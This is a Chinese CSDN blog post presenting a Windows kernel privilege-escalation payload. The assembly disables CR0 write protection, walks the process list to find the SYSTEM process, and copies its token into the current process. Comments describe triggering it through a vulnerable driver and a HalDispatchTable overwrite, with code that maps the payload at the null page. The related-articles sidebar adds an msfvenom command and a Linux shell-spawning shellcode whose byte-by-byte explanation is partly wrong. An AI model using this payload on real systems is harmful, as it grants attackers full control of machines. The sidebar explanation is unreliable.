一段提权的ShellCode

最新推荐文章于 2024-08-15 16:25:25 发布
最新推荐文章于 2024-08-15 16:25:25 发布
阅读量699 收藏
点赞数
分类专栏: 代码 文章标签: token system shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jbwd1/article/details/7380729
版权 
/*
Shell执行思路:
一般会运用某个驱动的BUG,使得ring3传入的地址指向的代码会被运行
比如:
一个驱动会将传入的地址的内容清0,那么可以将Shellcode拷贝到0x00地址处,然后触发shellcode
在Ring3获取HalDispatchTable表的地址X,X+4即存有函数HalQuerySystemInformation的地址,则利用BUG将此处修改为0,即可触发Shellcode
*/
ULONG uAttr;
NTSTATUS MYShellCode(/*此处是原函数的参数*/)
{
 //关闭内核保护
    _asm
    {
  cli
        mov eax, cr0;
        mov uAttr, eax;
        and eax, 0FFFEFFFFh;
        mov cr0, eax;
    }
 //提权到SYSTEM
 _asm
 {
  mov eax,0XFFDFF124
     mov eax,[eax];//获取当前线程PETHREAD
  mov esi,[eax+0x220];//获取当前所属进程的PEPROCESS
  mov eax,esi
searchXP:
  mov eax,[eax+0x88]
  sub eax,0x88;//获取进程链表中的下一个PEPROCESS
  mov edx,[eax+0x84]
  cmp edx,0x4
  jne searchXP
  mov eax,[eax+0xc8];//获取SYSTEM进程的TOKEN
  mov [esi+0xc8],eax
 }//修改当前进程的TOKEN
 //开启内核保护
    _asm
    {
  sti
        mov eax, uAttr;
        mov cr0, eax;
    }
 return 0;
}
/*
 在0x0处申请一段内存,并写入ring0 shellcode
*/
ShellcodeAddress=(PVOID)sizeof(ULONG);
status=ZwAllocateVirtualMemory(NtCurrentProcess(),&ShellCodeAddress,0,MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,PAGE_EXECUTE_READWRITE);
if(status)
 return;
RtlMoveMemory(ShellCodeAddress,(PVOID)MyShellCode,ShellCodeSize);


 

futosky
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅谈NT下Ring3无驱进入Ring0的方法
享受开发,颠倒银河
01-14 1万+
[原创]浅谈NT下Ring3无驱进入Ring0的方法 关键字:NT,Ring0,无驱   (测试环境:Windows 2000 SP4,Windows XP SP2. Windows 2003 未测试)   在NT下无驱进入Ring0是一个老生常谈的方法了,网上也有一些C代码的例子,我之所以用汇编重写是因为上次在 [原创/探讨]Windows 核心编程研究系列之一(改变进程
shellcode 执行盒
01-04
shellcode作为参数传入执行盒,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21...
特权级--ring3到ring0
guocaigao的专栏
01-15 1359
还记得吗?我们用调用门和lcall指令实现特权级由低到高的转移. 假设我们想由代码A转移到代码B,运用一个调用门G,即调用门G中的目标选择子指向代码B的段。实际上我们要考虑4个要素:CPL、RPL、DPL_B(代码B的DPL)、DPL_G(调用门G的DPL)。 第一步,当A访问调用门G时,规则相当于访问一个数据段,要求CPL和RPL都小于或者等于DPL_G.也就是CPL和RPL需要在更高的特权
exp提权源码
08-08
这段代码的核心目的是利用特定的漏洞(在此例中为MS11-046)来实现权限提升(提权)。下面将详细解释其中的关键知识点。 ### 1. MS11-046 漏洞介绍 MS11-046 是微软在2011年发布的安全公告之一,该漏洞存在于...
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
一段动态装载DLL的ShellCode汇编代码
09-10
一段动态装载DLL的ShellCode汇编代码,不需要引入任何的库
一款开源的ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量记得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,类似异常等...
win10安装openssl
futosky的专栏
08-20 7708
下载了openssl-1.1.0f.tar版本,按照网上的步骤老是在执行 ms\ms_do的时候失败,看这个目录下确实没有这个文件,折腾了好久。最后选择openssl-1.0.0s版本,按照如下步骤安装: VS2013中编译openssl的步骤和使用设置一.VS2013中编译openssl的步骤版本号:openssl-1.0.1e 1.下载 OpenSSL http://www.openssl.o
得到内核模块基地址
futosky的专栏
03-21 1156
//参考:combojiang: http://hi.baidu.com/combojiang/blog/item/bfa7a6d9f1c913ee38012f28.html // combojiang: http://hi.baidu.com/hu3167343/blog/item/3fb1cc91e9582507d31b7023.html // combojia
围绕SwapContext的一点代码
futosky的专栏
03-21 983
这次的胡乱探究原因在于看到了一个08年的帖子: · 标 题:HOOK SwapContext 枚举隐藏进程(学习笔记4) · 作 者:bzhkl · 时 间:2008-12-11 12:01 · 链 接:http://bbs.pediy.com/showthread.php?t=78464 都是很老的东西了,可惜很菜才开始关注 这篇帖子讲了HOOK SwapCo
栈回溯笔记
futosky的专栏
03-21 638
/* 栈回溯目的: 已知函数B调用函数A,现欲得到函数B的地址,则可以inline hook A,在fake_funcA内部进行栈回溯,最终得到B的地址 */ /* 使用OLLAYDBG跟踪~ 本练习程序的 A函数地址:0x00401005 JMP TO 0x00401030真实的A函数地址 B函数地址:0x0040100A JMP TO 0x00401070真实的B函数地
inline hook MmIsAddressValid
futosky的专栏
03-21 419
//用于inline hook #include KIRQL Irql; extern PEPROCESS pEprocess; /******************************************************************************************/// hook MmIsAddressValid ULONG g_
VC添加托盘的方法
futosky的专栏
08-21 304
好好整理一下思路。。。觉得还是要记录一下,以备以后参考。     VS2008还不太会用,结果消息映射是手工添加的。。。。(1)自定义消息        #ifndef WM_SHOWTASK         #define WM_SHOWTASK WM_USER+2000     //自定义消息        #endif(2)定义结构体        NOTIFYICONDATA nid;(3)在BEGIN_MESSAGE_MAP(CLanChatDlg, CDialog)        里面添加:  
MongoDB | MongoDB 终端查询
weixin_44435110的博客
08-12 826
MongoDB 是一个高性能、易扩展的文档型 NoSQL 数据库。本文档将指导你如何使用 MongoDB 的命令行工具`mongo` shell来查询存储在MongoDB数据库中的数据。
Shell编程
欢迎阅读我的博客
08-15 763
shell编程
linux定时自启动shell脚本
打不倒的程序猿
08-15 201
如果在编写脚本时遇到 -bash: ./test.sh: /bin/bash^M: 解释器错误: 没有那个文件或目录 则执行 >sed -i 's/\r$//' xxxx.sh 因为在windows下,用记事本编写脚本文件,会导致编译出错。windows下的换行符为\n\r,linux下的换行符为\n,所以需要对\r进行格式转换
shell编程中的管道符 ‘|‘
最新发布
2301_77836489的博客
08-15 465
shell编程中的管道符 '|'
排序算法之希尔排序
rd_w_csdn的博客
08-12 608
1959年Shell发明,是简单插入排序的改进版。是一种高效的排序算法,通过分组和逐步缩减增量,使得数组在接近有序的情况下进行最终排序,从而提高效率。
一段shellcode
09-05
这是一个简单的 shellcode,它会在 Linux 系统上打开一个终端窗口: ``` \x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 ``` 这段 shellcode 使用了几个汇编指令,具体如下: - `\x31\xc0`:将 eax 寄存器设置为 0 - `\x50`:将 eax 压入堆栈 - `\x68\x62\x61\x73\x68`:将字符串 "bash" 压入堆栈 - `\x68\x62\x69\x6e\x2f`:将字符串 "/bin" 压入堆栈 - `\x68\x2f\x2f\x2f\x2f`:将字符串 "////" 压入堆栈 - `\x89\xe3`:将堆栈顶部的值赋给 ebx 寄存器 - `\x50`:将 eax 压入堆栈 - `\x89\xe2`:将堆栈顶部的值赋给 edx 寄存器 - `\x53`:将 ebx 压入堆栈 - `\x89\xe1`:将堆栈顶部的值赋给 ecx 寄存器 - `\xb0\x0b`:将 11 赋给 eax,这是 execve 系统调用的编号 - `\xcd\x80`:调用系统调用 这段 shellcode 使用 execve 系统调用执行 /bin/bash,并且没有传递任何参数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值